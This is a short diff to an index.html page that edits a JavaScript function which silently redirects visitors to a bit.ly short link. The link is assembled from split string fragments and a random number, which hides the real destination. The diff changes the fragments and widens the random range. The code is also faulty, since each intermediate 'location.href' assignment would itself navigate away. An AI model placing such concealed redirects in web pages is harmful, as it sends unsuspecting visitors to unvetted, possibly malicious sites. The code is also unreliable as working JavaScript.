--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 <script type = "text/javascript">
 function reDirect() {
 a = location.href = "bit.ly/";
-b = location.href = "still";
-c = location.href = "what";
-d = Math.ceil(Math.random() * 4);
+b = location.href = "orlink";
+c = location.href = "2020vt";
+d = Math.ceil(Math.random() * 7);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
